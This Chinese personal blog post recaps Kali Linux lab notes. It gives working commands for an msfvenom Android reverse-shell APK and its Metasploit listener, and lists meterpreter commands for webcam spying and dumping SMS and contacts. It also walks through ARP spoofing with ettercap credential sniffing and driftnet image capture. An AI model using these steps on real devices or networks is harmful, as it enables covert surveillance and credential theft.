
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>那些年-Kali局域网msfvenom木马侵入和ARP欺骗与监听 - 糸色望</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="xuchunlei,博客,"> 
    <meta name="description" content="一个战五渣的个人博客,kali学得好，牢饭吃到饱。因为硬盘空间不多了，就想着把些没用的文件清理掉，就看到了KaliLinux的虚拟机有11G。几年前(20200629)学习过一点点，还能找到当时的记录，只能算自娱自乐，实,"> 
    <meta name="author" content="xuchl"> 
    <link rel="alternative" href="atom.xml" title="糸色望" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link rel="stylesheet" href="//fastly.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <link rel="stylesheet" href="/css/diaspora.css">
	<link rel="stylesheet" href="/intro/introjs.css">
    <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
    <script>
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?aa62861fd73e49c9dda3e2a2f5b6db5d";
          var s = document.getElementsByTagName("script")[0]; 
          s.parentNode.insertBefore(hm, s);
        })();
    </script>

</head>
</html>
<script src="//fastly.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>
<script type="text/javascript" src="../../../../js/jquery.toTop.min.js"></script>
<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">
<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>


<body class="loading">
    <span id="config-title" style="display:none">糸色望</span>
    <div id="loader"></div>
    <div id="bg"></div>
<div id="single">
    <script type="text/javascript" src="../../../../intro/intro.js"></script>
<script type="text/javascript">
	var intro = introJs();
	intro.setOptions({
		steps: [
			{
				element: '#step1',
				intro: "点击播放(暂停)音乐"
			}
		]
	});
	// 获取Cookie
	function getCookie(c_name){
		if (document.cookie.length > 0){
			var c_start = document.cookie.indexOf(c_name + "=")
			if (c_start != -1){
				c_start = c_start + c_name.length + 1;
				c_end = document.cookie.indexOf(";", c_start);
				if (c_end == -1) c_end = document.cookie.length;
					return unescape(document.cookie.substring(c_start, c_end));
			}
		}
		return ""
	}
	
	$(function($){
		setTimeout(function(){
			// 如果没有Cookie:introShow 进行引导
			if (getCookie('introShow') != "true") {
				document.cookie = "introShow=true";
				intro.start();
			}
		}, 2000);

		// 返回顶部
		$('.to-top').toTop();
	});
</script>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="https://xuchunlei.top"></a>
    <div id="step1" title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">那些年-Kali局域网msfvenom木马侵入和ARP欺骗与监听</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">那些年-Kali局域网msfvenom木马侵入和ARP欺骗与监听</h1>
        <div class="stuff">
            <span>四月 28, 2025</span>
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span>阅读量<span style="display:unset;" id="busuanzi_value_page_pv"></span></span>
            
  <ul class="post-tags-list"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/KaliLinux/">KaliLinux</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/黑客/">黑客</a></li></ul>


        </div>
        <div class="content markdown">
            <p><em>kali学得好，牢饭吃到饱。<br>因为硬盘空间不多了，就想着把些没用的文件清理掉，就看到了KaliLinux的虚拟机有11G。几年前(20200629)学习过一点点，还能找到当时的记录，只能算自娱自乐，实施是不可能实施的。简单整理下当时的记录，也有些懵懂了，看情况把KaliLinux虚拟机干掉，毕竟很老了</em></p>
<p><img src="/img/20250428/0.png" alt></p>
<h3 id="必须开启root和密码-大概"><a href="#必须开启root和密码-大概" class="headerlink" title="必须开启root和密码 大概"></a>必须开启root和密码 大概</h3><p><img src="/img/20250428/1.png" alt></p>
<h3 id="msfvenom木马侵入"><a href="#msfvenom木马侵入" class="headerlink" title="msfvenom木马侵入"></a>msfvenom木马侵入</h3><p>fping探查局域网接入设备IP<br><img src="/img/20250428/2.png" alt></p>
<p>nmap扫描⽬标主机系统<br><img src="/img/20250428/3.png" alt></p>
<p>生成木马 手机用 （-p载荷，LHOST本机IP，LPORT反向连接到主机的端口，R &gt;保存路径名字）<br>也能生成电脑用的exe文件<br><code>sfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.233 LPORT=5555 R &gt; /root/shell.apk</code><br><img src="/img/20250428/4.png" alt></p>
<p>植入基本没戏，也就在自己手机上弄弄。安装会报毒，权限没给的话好多又用不了。<br><img src="/img/20250428/5.jpg" alt><br><img src="/img/20250428/6.jpg" alt></p>
<p>植入成功的话，启动metasploit开始监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fmsfconsole</span><br><span class="line">use exploit/multi/handler #设置模块</span><br><span class="line">set payload android/meterpreter/reverse_tcp #设置载荷</span><br><span class="line">set lhost 192.168.88.233 #设置本机IP</span><br><span class="line">set lport 5555 #设置端口</span><br><span class="line">exploit #执行攻击</span><br></pre></td></tr></table></figure>

<p><img src="/img/20250428/7.png" alt></p>
<p>获取系统信息，摄像头拍照，通讯记录<br><img src="/img/20250428/8.png" alt></p>
<p>一些命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">? 查看更多命令</span><br><span class="line">cd --&gt;目录切换，命令：cd / 切换到根目录</span><br><span class="line">search --&gt;搜索文件，命令：search text.jpg</span><br><span class="line">download --&gt;下载文件，命令：download test.jpg</span><br><span class="line">webcam_list --&gt;查看摄像头列表，因为手机都是前置和后置摄像头了</span><br><span class="line">webcam_snap --&gt;拍照一张，需要选用前置或者后置摄像头，命令：webcam_snap -i 1</span><br><span class="line">webcam_stream --&gt;开启摄像头视频监控，同上，命令：webcam_stream -i 1</span><br><span class="line">安卓系统相关命令：</span><br><span class="line">check_root --&gt;查看当前安卓是否已经root</span><br><span class="line">dump_calllog --&gt;下载通话记录</span><br><span class="line">dump_contacts --&gt;下载通讯录</span><br><span class="line">dump_sms --&gt;下载短信记录</span><br><span class="line">geolocate --&gt;利用谷歌地图定位（需要安装谷歌地图）</span><br></pre></td></tr></table></figure>

<h3 id="ARP欺骗与监听"><a href="#ARP欺骗与监听" class="headerlink" title="ARP欺骗与监听"></a>ARP欺骗与监听</h3><p>#检查自己的网卡信息和网关<br><img src="/img/20250428/9.png" alt></p>
<p>ARP欺骗 （-i 网卡名 -t 目标主机 网关(主机和网关可交换或者-r双向攻击)）<br><code>arpspoof -i eth0 -t 192.168.88.77 192.168.88.1</code><br>arpspoof 是 dsniff 的一个附属工具，安装dsniff即可<br><code>apt-get install dsniff</code><br><img src="/img/20250428/10.png" alt></p>
<p>之前阿里企业邮箱网址http还是不带s的<br><img src="/img/20250428/11.png" alt></p>
<p>开启端口转发（0流量截断，断网 1流量转发）<br><code>echo 1 &gt;&gt; /proc/sys/net/ipv4/ip_forward</code>（临时，每次重启终端其内容会自动变为0。永久，需要修改/etc/sysctl.conf文件，net.ipv4.ip_forward = 1）<br>使用ettercap抓取HTTP提交的账号密码（-T文本模式运行 -q安静模式 -i网卡）<br><code>ettercap -Tq -i eth0</code><br>可以轻松获取输入的用户名和密码信息<br><img src="/img/20250428/12.png" alt></p>
<p>ARP欺骗（这里网关为目标，不然还是不能联网）<br><code>arpspoof -i eth0 -t 192.168.88.1 192.168.88.77</code></p>
<p><code>apt-get install driftnet</code><br>使用Driftnet从网络流量捕获图像（-i网卡 -d保存路径 -a后台运行）<br><code>driftnet -i eth0 -d /home/xuchl/arpImg -a</code><br>可以看到微信传输的一些图片，或者使用Wireshark来对其他包进行抓取<br><img src="/img/20250428/13.png" alt></p>
<p>基本只是复制粘贴以前记录的文本和图片，实际参考意义不大，记录用。</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="none" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='https://xuchunlei.top/music/1.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='https://xuchunlei.top/music/2.mp3'></li>
                        
                    
                        
                            <li title='2' data-url='https://xuchunlei.top/music/3.mp3'></li>
                        
                    
                        
                            <li title='3' data-url='https://xuchunlei.top/music/4.mp3'></li>
                        
                    
                        
                            <li title='4' data-url='https://xuchunlei.top/music/5.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='011b4badf2abf20b1741'
        data-cs='74e6beba54851d88788bd796d72e6a1399d11980'
        data-r='xuchlei.github.io'
        data-o='xuchlei'
        data-a='xuchlei'
        data-d='false'
    >查看评论</div>


    </div>
    
</div>


    </div>
    <a class="to-top"><img title="回到顶部" src="/img/Nyannko_Top.png"></a>
</div>
<div style="position: fixed; z-index: -1; left: -25px; bottom: -10px; display: block; user-select: none; transform: scale(0.5);">
    <img src="/img/Toru_gif.gif">
</div>
<div id="footer">
本站总访问量<span id="busuanzi_value_site_pv"></span>次&nbsp&nbsp
本站访客数<span id="busuanzi_value_site_uv"></span>人次
</div>

<canvas id="canvas"></canvas>
<script src="../../../../js/createjs.min.js"></script>
<script src="../../../../js/particlejs.min.js" charset="UTF-8"></script>
<script src="../../../../js/mouseparticle.js" charset="UTF-8"></script>
</body>
</html>
